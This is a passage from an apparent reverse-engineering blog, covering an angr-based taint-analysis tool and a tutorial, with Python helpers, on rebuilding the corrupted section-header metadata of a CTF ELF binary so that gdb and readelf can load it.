href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_sxPQCcCCKUNNTy5AYaGbdw55JukkZ-vcEp_z_EnkOQy7IBYks5QMpPR4LB58isdNzoH7hSVfDprpesyj4ECEK9pwfI-HWmq4d9_ePK0JrGFajhp4IJn-cSPXKb6rihya9R2G-amntvY/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="180" data-original-width="539" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_sxPQCcCCKUNNTy5AYaGbdw55JukkZ-vcEp_z_EnkOQy7IBYks5QMpPR4LB58isdNzoH7hSVfDprpesyj4ECEK9pwfI-HWmq4d9_ePK0JrGFajhp4IJn-cSPXKb6rihya9R2G-amntvY/s16000/Screenshot+from+2020-11-13+00-27-40.png" /></a></div><br /> <p></p><p>Now why would we want to use annotations? Well, when binary operations (and other AST operations) involve annotated operands, the annotations are carried over to the result. 
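</p><p>Here's a toy Python model of that propagation rule, together with the register check from the hook. It is not claripy: <span style="font-family: courier;">Expr</span>, <span style="font-family: courier;">TAINT</span> and <span style="font-family: courier;">tainted_arg_regs</span> are made-up names for illustration, and how real claripy annotations propagate depends on the annotation class, so check the claripy documentation before relying on this behavior. The register tuple is the six integer/pointer argument registers of the System V AMD64 ABI.</p>

```python
from dataclasses import dataclass

TAINT = "argv-taint"  # hypothetical annotation label

# Integer/pointer argument registers, in order, under the System V AMD64 ABI.
ARG_REGS = ("rdi", "rsi", "rdx", "rcx", "r8", "r9")


@dataclass(frozen=True)
class Expr:
    """Toy stand-in for a symbolic AST node that carries annotations."""
    text: str
    annotations: frozenset = frozenset()

    def _binop(self, other, op):
        if not isinstance(other, Expr):
            other = Expr(repr(other))  # concrete constants carry no annotations
        # The result inherits the union of both operands' annotations.
        return Expr(f"({self.text} {op} {other.text})",
                    self.annotations | other.annotations)

    def __add__(self, other):
        return self._binop(other, "+")

    def __xor__(self, other):
        return self._binop(other, "^")


def tainted_arg_regs(regs):
    """Names of argument registers whose value carries the TAINT annotation."""
    return [r for r in ARG_REGS if r in regs and TAINT in regs[r].annotations]


argv1 = Expr("argv1", frozenset({TAINT}))
regs = {
    "rdi": Expr("0x4010"),      # some unrelated pointer
    "rsi": argv1 + 8,           # pointer derived from argv[1]
    "rdx": Expr("len") ^ 0x20,  # unrelated value
}
print(tainted_arg_regs(regs))  # ['rsi']
```

<p>Only <span style="font-family: courier;">rsi</span> is reported, because only that value was derived from the annotated <span style="font-family: courier;">argv1</span>.</p><p>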
This means we can track the flow of input data if we set a starting taint on a value we know we control. Angr handles symbolic execution of the binary for us. The rest of the work is simply developing hooks for the functions we would like to intercept or report on, and making sure the hooks can inspect their symbolic states for annotations.</p><p>I've tested SporeCrawler on real-world binaries from my host machine as well as some simple litmus tests to make sure I'm not going crazy. Here's what a nice run of SporeCrawler looks like, with gnuplot as the target binary:</p><p> </p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhw6hl7libFukQqZebYtjPKLSCQga7o0DIeMmRNrXcL4XqK_VcrQwm4YPAciZ3LwF4MrMs_TFuHyLbrcNUOR83mlyXWmgqF_3aViap2aY-uGYOsnpDJZDWZ5Jc80rCjWY2hxwpsFhZelVs/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="1016" data-original-width="1848" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhw6hl7libFukQqZebYtjPKLSCQga7o0DIeMmRNrXcL4XqK_VcrQwm4YPAciZ3LwF4MrMs_TFuHyLbrcNUOR83mlyXWmgqF_3aViap2aY-uGYOsnpDJZDWZ5Jc80rCjWY2hxwpsFhZelVs/s16000/sporecrawler_testrun.gif" /></a></div><br /><br /><p></p><p>SporeCrawler has a couple of options, but it mostly serves as a good example of using angr to do taint analysis. Check out more about it here: <a href="https://gitlab.com/k3170makan/SporeCrawler.git">https://gitlab.com/k3170makan/SporeCrawler.git</a></p><p><br /></p><p><br /></p><p><b>[ELF Necromancy 0x0 ] Tricks for Resurrecting dead ELF files</b> (2020-11-11)</p> <div dir="ltr" style="text-align: left;" trbidi="on">
This post is going to cover some stuff I learned while suffering through some rando keygen-style reverse engineering CTFs. Basically, what do you do in order to patch up an ELF file if, say, some of the header information is lost, and can you do this using hexdump and hexedit alone? If you want to know how this turned out, stay tuned! <br /></div><div dir="ltr" style="text-align: left;" trbidi="on"><br /></div><div dir="ltr" style="text-align: left;" trbidi="on">ELF files don't need all their bells and whistles in order to execute (<i>barring some code that inspects itself for some stuff</i>). This means you don't actually need to specify every aspect of an ELF file to get it working: you can skip or provide false data for debug information, and you don't even need working section header meta-data (we'll show an example later on). So naturally some CTF problems exploit this as a cheap anti-debug trick, because GDB refuses to load such a file. So what are some things you can try in order to recover information from an ELF file if someone's messed up the meta-data?</div><div dir="ltr" style="text-align: left;" trbidi="on"><br /></div><h2 style="text-align: left;">Recovering Section Meta-data</h2><div dir="ltr" style="text-align: left;" trbidi="on">Okay, so we have an ELF executable called dead.elf, and it runs, but we cannot debug it. The challenge is to fix up the binary so that gdb is nice to it.</div><div dir="ltr" style="text-align: left;" trbidi="on"><br /></div><div dir="ltr" style="text-align: left;" trbidi="on">Fixing up the binary will mean recovering section data, and I won't formally introduce sections here. I've already done a post on them, but I will mention some of the important parts to make this post a bit easier to follow. 
Sections are named chunks of an ELF file, and the section headers act as annotations (<i>labels and type information</i>) describing those chunks. Your ELF files have a number of important sections holding special collections of code (<font face="courier">.init</font> and <font face="courier">.fini</font>), the symbol table, the bss and data sections, and other good stuff. To organize all of this information, a couple of data structures and offset fields are needed, namely:</div><div dir="ltr" style="text-align: left;" trbidi="on"><ul style="text-align: left;"><li>ELF header field <font face="courier">e_shentsize </font>- <i>the size of a single section header entry (64 bytes for ELF64)</i></li><li>ELF header field <font face="courier">e_shnum </font>- <i>the number of entries in the section header table</i></li><li>ELF header field <font face="courier">e_shoff </font>-<i> the offset in the ELF file where the section header table begins.</i><br /></li><li>ELF header field <font face="courier">e_shstrndx </font>- <i>the index of the .shstrtab entry in the section header table, which is how tools find the section names</i></li><li>Section Header Table - <i>list of data fields for sections</i> (<i>offset, size, type, flags, all that schpeel</i>)</li><li>Section String Table <font face="courier">.shstrtab </font>- <i>list of strings for labeling the sections in the Section Header Table.</i></li></ul><div>Okay, so spotting those things in the hex dump will obviously give you some clues for putting this puzzle together. </div><div> </div><div>To start off with, let's take a look at something very easy to spot in an ELF file: the Section String Table. 
Here's what the one for the <font face="courier">/bin/bash</font> ELF file looks like:</div><div> </div><div> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioKszrIHcjLdsIiQG0KHLQyyQQSuYj6XezxDVnTsPupkj-opSPpfhz0RD2vwj-O8oC2PP75ScO2_fcWiGW5dGDu5DIwHXWjtkVgj2KUzTlgVbHxUWj5p9ehozF-jBQmA1GUQDPkodrsqw/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="345" data-original-width="708" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioKszrIHcjLdsIiQG0KHLQyyQQSuYj6XezxDVnTsPupkj-opSPpfhz0RD2vwj-O8oC2PP75ScO2_fcWiGW5dGDu5DIwHXWjtkVgj2KUzTlgVbHxUWj5p9ehozF-jBQmA1GUQDPkodrsqw/s16000/Screenshot+from+2020-11-11+23-07-40.png" /></a></div><br /></div><div>To confirm we are looking at the correct section of the file we can use readelf:</div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEij4yF9Q8DKAtQj9kbYaRZF4X9GKf3vi6Zdg-cMfsJkpL28rBqtdLdjAcuX5B5k_E6_oK8U3l94EBGuFbuSeQmPFKksLUPv-rCPKMuEtvPh6CB12BYRWLsSOBxqe47hv1r40WtbkaHuYRk/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="64" data-original-width="633" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEij4yF9Q8DKAtQj9kbYaRZF4X9GKf3vi6Zdg-cMfsJkpL28rBqtdLdjAcuX5B5k_E6_oK8U3l94EBGuFbuSeQmPFKksLUPv-rCPKMuEtvPh6CB12BYRWLsSOBxqe47hv1r40WtbkaHuYRk/s16000/Screenshot+from+2020-11-11+23-07-30.png" /></a></div><br />That's freakishly close to the section we guessed above. Another huge clue that this is probably our section string table is, obviously, the prevalence of section names! Now, if you've found this, you know something else: how many sections there are, or at least a really good guess at it! 
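<p>Counting the names by hand gets old quickly, so here's a small Python sketch that splits a raw <span style="font-family: courier;">.shstrtab</span> blob on its NUL terminators. Keep in mind that <span style="font-family: courier;">e_shnum</span> also counts the reserved NULL entry at index 0 of the section header table, whose name is empty, so the header value is normally one more than the number of non-empty names. A linker may also let names share bytes in the table, so treat the result as an estimate to check against readelf rather than a guarantee. The sample blob is made up.</p>

```python
def section_names(shstrtab):
    """Split a raw .shstrtab blob into its non-empty NUL-terminated names."""
    return [chunk.decode("ascii", "replace") for chunk in shstrtab.split(b"\x00") if chunk]


def estimate_shnum(shstrtab):
    """Guess e_shnum: one header per distinct name, plus the NULL entry at index 0."""
    return len(set(section_names(shstrtab))) + 1


blob = b"\x00.shstrtab\x00.interp\x00.text\x00.data\x00.bss\x00"
print(section_names(blob))   # ['.shstrtab', '.interp', '.text', '.data', '.bss']
print(estimate_shnum(blob))  # 6
```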
</div><div> </div><div>Here's the string table from our dead.elf binary:</div><div> </div><div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhV-awzSbUNKW1g_neeD2C7RcwQ9c4OYAlr-nCHkCexRSqFK-YmbUpiaCHj2IS02xGyaVYgWViHFHjm149wvnryMSRTUMyq11WYnxCfsaR-rAG3C0pPVjfvJe6PAaTNBgaD77BNFMHuiS0/" style="margin-left: auto; margin-right: auto;"><img alt="" data-original-height="164" data-original-width="860" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhV-awzSbUNKW1g_neeD2C7RcwQ9c4OYAlr-nCHkCexRSqFK-YmbUpiaCHj2IS02xGyaVYgWViHFHjm149wvnryMSRTUMyq11WYnxCfsaR-rAG3C0pPVjfvJe6PAaTNBgaD77BNFMHuiS0/s16000/Screenshot+from+2020-11-11+23-42-06.png" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"> I counted 24 distinct section names so I'm going with that!<br /></td></tr></tbody></table><br /> <br /></div><div> </div><div>This information means you can immediately fill in <font face="courier">e_shnum</font> (<i>24 section names, by my count</i>), which helps, but we still have more arcane symbols to find before our ELF lives again! Next we should try to find the beginning of the section header table; if we guess this right, readelf should be able to interpret our sections neatly. 
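<p>Once you have a candidate offset, the tips that follow can be scripted. Here's a rough Python sketch, assuming a little-endian ELF64 file. It rounds the end of .shstrtab up to an 8-byte boundary as a first guess (my assumption, based on GNU-built binaries), checks that the first 64-byte entry there is the all-zero NULL entry, checks that allocated sections have <span style="font-family: courier;">sh_addr</span> and <span style="font-family: courier;">sh_offset</span> agreeing modulo the page size, looks for the GNU_HASH type bytes, and finally writes <span style="font-family: courier;">e_shoff</span>, <span style="font-family: courier;">e_shnum</span> and <span style="font-family: courier;">e_shstrndx</span> back into the header. The header offsets come from the ELF64 layout; the helper names and the synthetic demo image are illustrative.</p>

```python
import struct

SHDR = struct.Struct("<IIQQQQIIQQ")  # one Elf64_Shdr, 64 bytes
SHT_GNU_HASH = 0x6FFFFFF6            # dumps as f6 ff ff 6f on little-endian
PAGE_SIZE = 0x1000

# Byte offsets of the section-header fields inside the 64-byte ELF64 header.
E_SHOFF, E_SHENTSIZE, E_SHNUM, E_SHSTRNDX = 0x28, 0x3A, 0x3C, 0x3E


def align_up(value, alignment=8):
    return (value + alignment - 1) & ~(alignment - 1)


def read_shdr(data, off):
    f = SHDR.unpack_from(data, off)
    return {"sh_name": f[0], "sh_type": f[1], "sh_addr": f[3], "sh_offset": f[4], "sh_size": f[5]}


def plausible_table(data, start, count):
    """Heuristic: NULL entry first, then sh_addr/sh_offset congruent mod page size."""
    if start + count * SHDR.size > len(data):
        return False
    if any(data[start:start + SHDR.size]):
        return False  # index 0 should be the all-zero NULL section header
    for i in range(1, count):
        sh = read_shdr(data, start + i * SHDR.size)
        if sh["sh_addr"] and (sh["sh_addr"] - sh["sh_offset"]) % PAGE_SIZE:
            return False
    return True


def gnu_hash_type_hits(data):
    """File offsets where the SHT_GNU_HASH value appears (candidate sh_type fields)."""
    needle = struct.pack("<I", SHT_GNU_HASH)
    hits, pos = [], data.find(needle)
    while pos != -1:
        hits.append(pos)
        pos = data.find(needle, pos + 1)
    return hits


def patch_header(data, shoff, shnum, shstrndx, shentsize=SHDR.size):
    """Return a copy of a little-endian ELF64 image with new section-header fields."""
    if data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        raise ValueError("expected a little-endian ELF64 file")
    out = bytearray(data)
    struct.pack_into("<Q", out, E_SHOFF, shoff)
    struct.pack_into("<HHH", out, E_SHENTSIZE, shentsize, shnum, shstrndx)
    return bytes(out)


# Synthetic demo: fake header, a fake .shstrtab at 0x40..0x79, then 4 section headers.
# On a real file you would start from: data = open("dead.elf", "rb").read()
image = bytearray(0x200)
image[:6] = b"\x7fELF\x02\x01"
guess = align_up(0x40 + 0x39)  # end of .shstrtab rounded up: 0x80
SHDR.pack_into(image, guess + 64, 1, 1, 6, 0x1040, 0x1040, 0x10, 0, 0, 16, 0)
SHDR.pack_into(image, guess + 128, 9, SHT_GNU_HASH, 2, 0x3A0, 0x3A0, 0x24, 0, 0, 8, 0)
SHDR.pack_into(image, guess + 192, 19, 3, 0, 0, 0x40, 0x39, 0, 0, 1, 0)  # .shstrtab
print(hex(guess), plausible_table(image, guess, 4), gnu_hash_type_hits(image))
fixed = patch_header(bytes(image), shoff=guess, shnum=4, shstrndx=3)
```

<p>Running readelf -S on the patched file is the real test: if the names and types line up, the guess was right.</p>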
</div><div> </div><div>Now, you may be super good at this and able to spot groups of bytes that match the format by eye, but there are a couple of things I realized that can speed up the search:</div><div><ul style="text-align: left;"><li>Each section header table entry has two fields, right after one another, that are usually very close in value: <font face="courier">sh_addr </font>and <font face="courier">sh_offset</font>. These specify the virtual address of the section (<i>where it will appear in memory</i>) and the offset of the section in the file, respectively. They stand out during manual inspection because one number is usually a predictable offset from the other, or simply the same number repeated! (For sections that get loaded into memory, the two normally agree modulo the page size, since the loader maps the file in page-sized pieces.) A common pattern is <span style="font-family: courier;">sh_offset</span> being some <font face="courier">0xYYY </font>and <font face="courier">sh_addr </font>then being <font face="courier">0xDYYY</font>, where <font face="courier">0xD</font> is some number between <font face="courier">0x1 </font>and <font face="courier">0xF</font>. This is actually pretty easy to spot in a hex dump.</li></ul><div><br /></div><ul style="text-align: left;"><li>For Linux-based ELF files, there is a noticeable pattern to the type fields: you only tend to see numbers from a small range. Typically you'll also see some <font face="courier">SHT_NOTE</font> sections. 
Also, if the binary was built with the GNU toolchain, the linker may slap a familiar byte pattern into the <font face="courier">sh_type </font>field of its own meta-data sections, namely .gnu.hash, .gnu.version and their cousins, whose type values all sit in the <font face="courier">0x6ffffff0</font> to <font face="courier">0x6fffffff</font> range.</li></ul><div><span> </span><span> <table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsfRcfcjPL0lU6L7T-WnCBOWvE7-SAl3EvD45kQefxe1qJHxknXPEHqvDxfjXtCvoPqVxxdmbWoKc5UF1PasHVR5zLvqoWa2B61_wihuAY4v4KWfM6bywmIxk0J_heMUTZopzRb435T78/" style="margin-left: auto; margin-right: auto;"><img alt="" data-original-height="76" data-original-width="704" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsfRcfcjPL0lU6L7T-WnCBOWvE7-SAl3EvD45kQefxe1qJHxknXPEHqvDxfjXtCvoPqVxxdmbWoKc5UF1PasHVR5zLvqoWa2B61_wihuAY4v4KWfM6bywmIxk0J_heMUTZopzRb435T78/s16000/Screenshot+from+2020-11-11+23-28-38.png" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Example of the "familiar pattern" left in GCC-compiled binaries: this is the <span style="font-family: courier;">GNU_HASH</span> section, whose type value <span style="font-family: courier;">0x6ffffff6</span> shows up in a little-endian dump as the bytes <span style="font-family: courier;">f6 ff ff 6f</span>. Try to remember this pattern of bytes for later on: <span style="font-family: courier;">0xf6ffff6f</span><br /></td></tr></tbody></table><br /></span><br /></div><ul style="text-align: left;"><li>A good place to start the search is right after the<font face="courier"> .shstrtab</font>: in my experience, at least for Ubuntu/GNU GCC ELFs, the section header table is usually placed there (<i>this may of course vary by compiler, linker and operating system</i>). In fact, the value of <span style="font-family: courier;">e_shoff</span> usually points just past the end of the <span style="font-family: courier;">.shstrtab</span> (possibly padded up to an 8-byte boundary). What you see there first is a run of nulls, which is the reserved, all-zero NULL entry at index 0, followed by the rest of the section header table. 
</li></ul>The last point comes outta nowhere, and I don't really justify it anywhere else in this post. So here are some samples showing that the section header table often starts right after the section string table:</div><div><p></p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijbcHT5PvK8y-7xRkdL1CXnd4sToro9i2Jqui8RBdVAiWpcPJdfUwMqB0RggRQKz8zzv7b-4aH0qKsshiuBbl59LpyBLeggo6QD4uIPcZoUAONFV4mRZoL6hQvve3a05vZAGn-tsXZGGw/" style="margin-left: auto; margin-right: auto;"><img alt="" data-original-height="39" data-original-width="612" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijbcHT5PvK8y-7xRkdL1CXnd4sToro9i2Jqui8RBdVAiWpcPJdfUwMqB0RggRQKz8zzv7b-4aH0qKsshiuBbl59LpyBLeggo6QD4uIPcZoUAONFV4mRZoL6hQvve3a05vZAGn-tsXZGGw/s16000/Screenshot+from+2020-11-11+23-21-51.png" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><br /></td></tr></tbody></table><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgN-Pnemd5LL153supk242tsAgLtBe1PtgwhGs3ifYoxa9AEaPIjNbQGAte1C6b1vrJxbzWp57Pgmbkwmzqh9u7M5hxtC12I4njJ8UYHO2eRlT8rb_uxfCXaMGERDmwTZRHkksslzE8LW0/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="162" data-original-width="710" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgN-Pnemd5LL153supk242tsAgLtBe1PtgwhGs3ifYoxa9AEaPIjNbQGAte1C6b1vrJxbzWp57Pgmbkwmzqh9u7M5hxtC12I4njJ8UYHO2eRlT8rb_uxfCXaMGERDmwTZRHkksslzE8LW0/s16000/Screenshot+from+2020-11-11+23-22-35.png" /></a></div><p></p><p>The screenshots above are for grep. Note the readelf extract, as before, showing that the section string table begins at <span style="font-family: courier;">0x3013c</span>. 
In the dump we can see the end of the section string table and the beginning of the section header table. Converting the section header offset (<span style="font-family: courier;">e_shoff</span>) to hex confirms this:</p><p></p><p><span style="font-family: courier;">hex(197216) = 0x30260</span>, which is right where the .shstrtab ends for us! You're gonna hafta believe me that this is a common enough pattern, mostly because I'm not going to bloat my blog post with lots of repetitive examples.</p><p>So let's try these tricks on a real binary and work it from an undebuggable, defiled corpse into a living, breathing binary totally under our control.<br /><br /></p><div><h2 style="text-align: left;">ELF Necromancy in Practice </h2></div><div><br /></div></div><div>As mentioned before, the binary doesn't respond well to gdb. When we try to open it in gdb we get this annoying message:</div><div><span style="font-family: courier;"><br /></span></div><div><span style="font-family: courier;">>$ gdb ./dead.elf </span></div><div><span style="font-family: courier;"><br /></span></div><div><span style="font-family: courier;"> ...</span></div><div><span style="font-family: courier;">Type "apropos word" to search for commands related to "word"...<br />"/home/kh3m/Research/CTF/elf_necromancy/misc/./dead.elf": not in executable format: file truncated<br /> </span></div><div><br /></div><div>Checking this out with readelf:</div><div> </div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_-gG_X7-qVhi4KdsY9eDeU_ncdLETXwFhsdTdgA9u4C3RLeLjMmuFSK7xcpMZYFHDOwzwSuaHxxb2lbSWn5bwh7kTzQHCm12dOfwrnkHENiCRmzXw34yuY6YwIjbu4GgbQjiyq6P4bhc/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="494" data-original-width="866" 
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_-gG_X7-qVhi4KdsY9eDeU_ncdLETXwFhsdTdgA9u4C3RLeLjMmuFSK7xcpMZYFHDOwzwSuaHxxb2lbSWn5bwh7kTzQHCm12dOfwrnkHENiCRmzXw34yuY6YwIjbu4GgbQjiyq6P4bhc/s16000/Screenshot+from+2020-11-11+21-12-55.png" /></a></div><br /><div><br /></div><div>Looks like the program headers might be just fine (<i>I checked, they are</i>), which means our binary should still be able to execute. However, there's obviously something wrong with the <span style="font-family: courier;">e_shnum</span> and <span style="font-family: courier;">e_shoff</span> fields in the ELF header. </div><div> </div><div>We already have some freebies, namely the location of the .shstrtab and the number of sections (24). So we can patch these in and see if we get any more positive feedback. Here's the header before the patch:</div><div> </div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjy19l7sYagLysJHAoOFdGFmkfrlLTF8H8MRvN-Pjpttus2oRpm6UfDgIAgQeEXcqceaOwsH5gR8PJo8hwWerV6O2CgJFiLxX8Vb8G2FwEn8G-i6bYwijf5tlCG9wOfG6QRXTKk6ehij64/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="434" data-original-width="1411" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjy19l7sYagLysJHAoOFdGFmkfrlLTF8H8MRvN-Pjpttus2oRpm6UfDgIAgQeEXcqceaOwsH5gR8PJo8hwWerV6O2CgJFiLxX8Vb8G2FwEn8G-i6bYwijf5tlCG9wOfG6QRXTKk6ehij64/s16000/Screenshot+from+2020-11-11+23-52-47.png" /></a></div><br /><br /></div><div><br /></div><div>And here's after:</div><div> </div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOd20S_cBYYi2z484Xt82zZO_KIKoxVKvsHavXFcf08GH02ntoKpRIX0MYxqEmuYP4HdlEr3TdQuOWGrozRo2kL5chQ-l1lYC9grOAzh6LidWOKQqLroY7VwMXfb097b53ha3xldjCt4Q/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="420" data-original-width="1396" 
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOd20S_cBYYi2z484Xt82zZO_KIKoxVKvsHavXFcf08GH02ntoKpRIX0MYxqEmuYP4HdlEr3TdQuOWGrozRo2kL5chQ-l1lYC9grOAzh6LidWOKQqLroY7VwMXfb097b53ha3xldjCt4Q/s16000/Screenshot+from+2020-11-11+23-55-50.png" /></a></div><br /><br /></div><div> </div><div>Okay, so that worked out nicely. We still have a couple more things to achieve, so on to the next phase: finding <span style="font-family: courier;">e_shoff</span>, the beginning of the section header table. Given that this binary was probably compiled with GCC, we can expect the actual <span style="font-family: courier;">e_shoff</span> to be near the end of the <span style="font-family: courier;">.shstrtab</span>. Here's what that section looks like:</div><div> </div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYftSLx0Au40BAw4voG1wom6l0WaOPRe6JB8kiLzFWMX8a_xWqNwxYe9FRFVtb2gINCUHMGLQxDMTzUctfEHHLsqu4mZO2kfYIwpN_LcFgGIjj3lTaNZt3tAmSwKvTCHra_x0E29Eh140/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="418" data-original-width="870" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYftSLx0Au40BAw4voG1wom6l0WaOPRe6JB8kiLzFWMX8a_xWqNwxYe9FRFVtb2gINCUHMGLQxDMTzUctfEHHLsqu4mZO2kfYIwpN_LcFgGIjj3lTaNZt3tAmSwKvTCHra_x0E29Eh140/s16000/Screenshot+from+2020-11-12+00-20-35.png" /></a></div><br /><br /></div><div>Looking at some of the dead giveaways for a section header table, especially the <span style="font-family: courier;">0xf6ffff6f</span> GNU_HASH byte pattern from earlier, we can be pretty confident we just found ours! 
Looking at the dump, I'm going to guess that <span style="font-family: courier;">0x3168</span> is where it starts. If we patch this in, readelf shows the following:</div><div><br /></div><div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQ-ptAi3Y79e6BnXXM0LxLI8qxVS1rSqV7RG0ZW_f5O2tcUBnH4Gg9Jgp_KUyRB-lI8St-M0sAjLc_puwLeSDfSLFk6hyS7q-31XIwXQsyDDst9qzOmErgc6pV4fARxadaZr1Ug6_CFqI/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="533" data-original-width="1431" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQ-ptAi3Y79e6BnXXM0LxLI8qxVS1rSqV7RG0ZW_f5O2tcUBnH4Gg9Jgp_KUyRB-lI8St-M0sAjLc_puwLeSDfSLFk6hyS7q-31XIwXQsyDDst9qzOmErgc6pV4fARxadaZr1Ug6_CFqI/s16000/Screenshot+from+2020-11-12+00-00-29.png" /> </a></div><div class="separator" style="clear: both; text-align: center;"> </div></div><div dir="ltr" style="text-align: left;" trbidi="on">And bingo, we have something that can be parsed as a section header table! There are still some problems, though. It looks like someone messed with the link fields, so we're going to need to fill them out. And I think that will make a great follow-up post!<div><br /></div></div></div>
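<div>The search heuristics from this post can be folded into a small helper. Below is a minimal Python sketch. It assumes a little-endian ELF64 file and a known (or guessed) section count. The function names are hypothetical and are not part of readelf or any other tool used above. The sketch checks three things: an all-zero first entry (the null section header at index 0), <span style="font-family: courier;">sh_type</span> values from a small whitelist that includes the GNU_HASH pattern, and <span style="font-family: courier;">sh_addr</span> equal to <span style="font-family: courier;">sh_offset</span> or a whole number of pages above it. It also writes <span style="font-family: courier;">e_shoff</span>, <span style="font-family: courier;">e_shnum</span> and <span style="font-family: courier;">e_shstrndx</span> back into the header, which is one way to apply the patches described above.</div>

```python
import struct
from typing import Optional

# Little-endian ELF64 header offsets (Elf64_Ehdr layout)
E_SHOFF = 0x28       # Elf64_Off  e_shoff
E_SHENTSIZE = 0x3A   # Elf64_Half e_shentsize, followed by e_shnum and e_shstrndx
SHDR_SIZE = 64       # sizeof(Elf64_Shdr)

# Heuristic whitelist of sh_type values seen in GCC-built Linux ELFs.
# SHT_NULL (0) is deliberately excluded: only entry 0 should be null.
PLAUSIBLE_SH_TYPES = {
    1, 2, 3, 4, 5, 6, 7, 8, 9, 11, 14, 15, 16,  # SHT_PROGBITS..SHT_PREINIT_ARRAY, minus SHT_SHLIB
    0x6FFFFFF6,  # SHT_GNU_HASH, bytes f6 ff ff 6f on disk
    0x6FFFFFFE,  # SHT_GNU_verneed (.gnu.version_r)
    0x6FFFFFFF,  # SHT_GNU_versym (.gnu.version)
}


def looks_like_shdr_table(data: bytes, off: int, shnum: int) -> bool:
    """Heuristically check for an Elf64_Shdr table of `shnum` entries at `off`."""
    if off % 8 or shnum < 2 or off + shnum * SHDR_SIZE > len(data):
        return False
    # Entry 0 (SHN_UNDEF) is all zeros, barring extended section numbering.
    if any(data[off:off + SHDR_SIZE]):
        return False
    for i in range(1, shnum):
        base = off + i * SHDR_SIZE
        # Elf64_Shdr: sh_name u32, sh_type u32, sh_flags u64, sh_addr u64, sh_offset u64, ...
        (sh_type,) = struct.unpack_from("<I", data, base + 4)
        sh_addr, sh_offset = struct.unpack_from("<QQ", data, base + 16)
        if sh_type not in PLAUSIBLE_SH_TYPES:
            return False
        # Allocated sections: sh_addr equals sh_offset or sits whole pages above it.
        if sh_addr and (sh_addr < sh_offset or (sh_addr - sh_offset) % 0x1000):
            return False
    return True


def find_shdr_table(data: bytes, shnum: int, start: int = 0) -> Optional[int]:
    """Return the first 8-byte-aligned offset >= start that passes the heuristic."""
    off = (start + 7) & ~7
    while off + shnum * SHDR_SIZE <= len(data):
        if looks_like_shdr_table(data, off, shnum):
            return off
        off += 8
    return None


def patch_shdr_fields(elf: bytearray, shoff: int, shnum: int, shstrndx: int) -> None:
    """Write e_shoff, e_shentsize, e_shnum and e_shstrndx into an ELF64 header."""
    struct.pack_into("<Q", elf, E_SHOFF, shoff)
    struct.pack_into("<HHH", elf, E_SHENTSIZE, SHDR_SIZE, shnum, shstrndx)
```

<div>Both checks are heuristics and will reject unusual but valid tables. Treat a hit as a candidate to confirm with readelf rather than as proof. Passing the end of the <span style="font-family: courier;">.shstrtab</span> as <span style="font-family: courier;">start</span> mirrors the tip about where GCC-built binaries usually place the table.</div>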
